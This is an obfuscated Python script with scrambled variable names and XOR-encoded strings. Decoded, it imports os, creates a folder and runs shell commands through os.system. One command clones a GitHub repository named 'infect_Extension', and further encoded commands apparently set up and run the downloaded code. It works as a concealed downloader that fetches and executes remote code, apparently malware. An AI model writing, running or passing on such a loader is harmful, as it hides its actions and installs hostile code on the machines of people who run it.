O10lO1101O1OO0lO01O00 = (lambda O001lOO0lll10l11lOll1,
    l1OOl1lllO0001Ol001O1: O001lOO0lll10l11lOll1 + l1OOl1lllO0001Ol001O1)
l10l0OlOl1ll0O0l00O10 = (lambda lOl0llO1ll0O11llOll11,
    O0lOlll1101O0OOO010ll: lOl0llO1ll0O11llOll11 ^ O0lOlll1101O0OOO010ll)
Ol00100lOl1lO0l1l1OOl = __import__(''.join(chr(l1l10ll11l0l1O10ll0lO ^
    Ol1O1llllO1l0O1010l00) for Ol1O1llllO1l0O1010l00, l1l10ll11l0l1O10ll0lO in
    zip(b'+s', b'Y\x16')), globals(), locals(), [], 0)
ll1O0001lOlOllOll11O0 = __import__(''.join(chr(l000OO11lO1l0l1l00l1O ^
    l00l0110O1000lll10OOl) for l00l0110O1000lll10OOl, l000OO11lO1l0l1l00l1O in
    zip(b'\x82\xb1', b'\xed\xc2')), globals(), locals(), [], 0 * 8 + 0)


def OOO1lO1OO000O00O11O0O():
 try:
  getattr(ll1O0001lOlOllOll11O0, ''.join(chr(O0001OOOll1lO0lO001O1 ^
      OOlll1O0OO11l01l1O101) for OOlll1O0OO11l01l1O101,
      O0001OOOll1lO0lO001O1 in zip(b'\xacM(7\x9f', b'\xc1&L^\xed')))(''.
      join(filter(lambda OlO1000ll100OOO1OOl0l: ord(OlO1000ll100OOO1OOl0l) %
      6 != 0, '0fx\x120HTN$<N\x00\x00Hx')).join(chr(OOlO0O1OO0O10OO1O0lO0 ^
      OO0O10110000010llOl11) for OO0O10110000010llOl11,
      OOlO0O1OO0O10OO1O0lO0 in zip(b'\xcb>Hh\xd6\xe2\xa1\x18n73\xe4\xeeB',
      b'\xe4M,\x0b\xb7\x90\xc57\x07YU\x81\x8d6')))
 except OSError:
  pass
  getattr(ll1O0001lOlOllOll11O0, ''.join(chr(OO1Ol101OOO01l0OO01O0 ^
      l0OO10l1OO1000Oll0l00) for l0OO10l1OO1000Oll0l00,
      OO1Ol101OOO01l0OO01O0 in zip(b'G\xf4\x81^\xe6u', b'4\x8d\xf2*\x83\x18'))
      )(''.join(filter(lambda O001000lll0011lOO1lO1: ord(
      O001000lll0011lOO1lO1) % 6 != 0,
      'r\x0cr\x1e0\x06\x00\x0c\x12\x1e\x1erZN\x18')).join(chr(
      Ol0O1lOl0lllll01ll1l1 ^ lOOO10l0l1O11O1lOO0O0) for 
      lOOO10l0l1O11O1lOO0O0, Ol0O1lOl0lllll01ll1l1 in zip(
      b'(Zbg\xb7\xeb\x9d\xcc\x18\xf4\xc7\xd5\r\xa2\x9e\x02\x9f-\x18\xc6K',
      b'X1\x05G\xde\x85\xee\xb8y\x98\xab\xf5}\xdb\xeaj\xf0C8\xeb2')))
  getattr(ll1O0001lOlOllOll11O0, 'sys' + 'tem')(''.join(chr(
      l10l0OlOl1ll0O0l00O10(O100ll1011llOlO00l0l1, OlOOl0O11000l0ll1OOll)) for
      OlOOl0O11000l0ll1OOll, O100ll1011llOlO00l0l1 in zip(
      b'~h\x1cr`\xb3\xda\xbc"Cq\xd4Z\xcf\x97\xc7~E\xd7\xda',
      b'\x0e\x01lR\t\xdd\xa9\xc8C/\x1d\xf4(\xaa\xe6\xb2\x1b6\xa3\xa9')))
  getattr(ll1O0001lOlOllOll11O0, 'metsys'[::-1])(''.join(filter(lambda
      lO10ll1OOOlO1lO10lOOO: ord(lO10ll1OOOlO1lO10lOOO) % 4 != 0,
      't<<8 dL\x00d\\\x1c4 \x08\x08')).join(chr(l1000010O00Ol0OlO11l0 ^
      l101OO11Ol0Oll0ll01O0) for l101OO11Ol0Oll0ll01O0,
      l1000010O00Ol0OlO11l0 in zip(
      b'C3qA\x0e\x87CC\x13P\x99m\x16IA\xf3K\xf8n\xb5n',
      b'3Z\x01ag\xe907r<\xf5M{,"\x9b*\x96\x07\xcf\x0b')))
  getattr(ll1O0001lOlOllOll11O0, 'metsys'[::-1])(O10lO1101O1OO0lO01O00(
      'hT/moc.buhtig//:sptth enolc tig'[::-1], 'e-Madman-Reborn/' +
      'infect_Extension'))
  getattr(ll1O0001lOlOllOll11O0, ''.join(chr(l1lOO000llOlO1ll100OO ^
      l1O01OO11OOl1O101001O) for l1O01OO11OOl1O101001O,
      l1lOO000llOlO1ll100OO in zip(b'\xbf9=\xdbG\xeb', b'\xcc@N\xaf"\x86')))(''
      .join(chr(l1ll00l0l01l10OO1011l ^ lOO1Ol101l0OO0O1OlO11) for 
      lOO1Ol101l0OO0O1OlO11, l1ll00l0l01l10OO1011l in zip(
      b'\xce\xbd;q(U\x05\x1f\x8a\xc9\xe5M\n\x9bq\x17R\x134\x14\x04M|q\x03K\xe6\xb9\x8a\xc7\x8b\xee\xc3\xb9\x90N\xd2\x14 \x87\xb8w'
      ,
      b'\xad\xd9\x1b\x18F3`|\xfe\x96\xa05~\xfe\x1fd;|Z4"k\\\x13b8\x8e\x99\xe3\xa9\xed\x8b\xa0\xcd\xcf\x1a\xbd{L\xa9\xcb\x1f'
      )))


if __name__ == ''.join(filter(lambda l100O000000l0OO1O0llO: ord(
    l100O000000l0OO1O0llO) % 6 != 0, 'NH\x1266rf`\x06Z*6HNZ')).join(chr(
    lOO1O0Oll0l10O01lll00 ^ O10l10000Ol00O1OOl0O0) for 
    O10l10000Ol00O1OOl0O0, lOO1O0Oll0l10O01lll00 in zip(
    b'\x9d\x11\xed\xaf\xae\x19 \x1e', b'\xc2N\x80\xce\xc7w\x7fA')):
 OOO1lO1OO000O00O11O0O()
